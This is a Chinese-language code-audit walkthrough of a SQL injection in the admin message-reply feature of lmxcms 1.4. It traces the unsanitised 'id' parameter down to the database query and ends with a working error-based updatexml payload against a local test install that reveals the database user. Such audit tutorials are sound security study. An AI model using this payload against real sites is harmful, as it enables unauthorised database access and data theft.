该漏洞信息仅提到后台Bo***.cl***.php文件存在SQL注入漏洞,bo开头的文件只有一个对应的就是BookAction.class.php文件。那么如何判断BookAction.class.php的注入点呢?

判断注入点首先肯定要看参数和变量

public function reply(){

$id = $_GET['id'] ? $_GET['id'] : $_POST['id'];

//获取回复数据

$reply = $this->bookModel->getReply(array($id));

if($reply){

$reply = string::html_char($reply[0]['content']);

$this->smarty->assign('content',$reply);

$this->smarty->assign('type','update');

}else{

$this->smarty->assign('type','add');

}

if(isset($_POST['reply'])){

if(!$_POST['content']){

rewrite::js_back('回复内容不能为空');

}

$this->bookModel->reply(array('id'=>$id,'type'=>$_POST['type'],'username'=>$this->username));

addlog('留言回复【id:'.$_POST['id'].'】');

rewrite::succ('修改成功','?m=Book');

}

$this->smarty->assign('id',$id);

$this->smarty->display('Book/reply.html');

}

只有变量id是明确如何被接收的,其他的几个变量不知道在哪被接收,所以优先观察变量id。如何判断变量有没有注入,需要观察SQL语句,但是reply()函数中并没有SQL语句,需要跟踪变量id出现的函数getReply,观察该函数是否有数据库操作功能。

跟踪函数getReply到F:\phpstudy\phpstudy_pro\WWW\lmxcms1.4\m\BookModel.class.php

//根据留言id获取全部回复

public function getReply(array $id){

$id = implode(',',$id);

$param['where'] = 'uid in('.$id.')';

return parent::selectModel($param);

}

函数getReply中依然没有SQL语句,继续跟踪selectModel函数F:\phpstudy\phpstudy_pro\WWW\lmxcms1.4\class\Model.class.php

//获取数据

protected function selectModel($param=array()){

if($param['field']){

$this->field=$param['field'];

}

return parent::selectDB($this->tab['0'],$this->field,$param);

}

selectModel函数中依然没有SQL语句,继续跟踪selectDB函数F:\phpstudy\phpstudy_pro\WWW\lmxcms1.4\class\db.class.php

protected function selectDB($tab,Array $field,$param=array()){

$arr = array();

$field = implode(',',$field);

$force = '';

//强制进入某个索引

if($param['force']) $force = ' force index('.$param['force'].')';

if($param['ignore']) $force = ' ignore index('.$param['ignore'].')';

$sqlStr = $this->where($param);

$sql="SELECT $field FROM ".DB_PRE."$tab$force $sqlStr";

$result=$this->query($sql);

while(!!$a=mysql_fetch_assoc($result)){

$arr[]=$a;

}

$this->result($result);

return $arr;

}

selectDB函数中终于出现了SQL语句$sql="SELECT $field FROM ".DB_PRE."$tab$force $sqlStr";在sql语句后添加echo $sql;用于输出sql语句便于判断

找到SQL注入点后,构造payload:http://127.0.0.1/lmxcms1.4/admin.php?m=Book&a=reply&id=1,其中m=Book用于触发方法BookAction.class.php,a=reply指向reply方法,语句成功执行

payload:http://127.0.0.1/lmxcms1.4/admin.php?m=Book&a=reply&id=1) and updatexml(0,concat(0x7e,user()),1)%23,成功查询到用户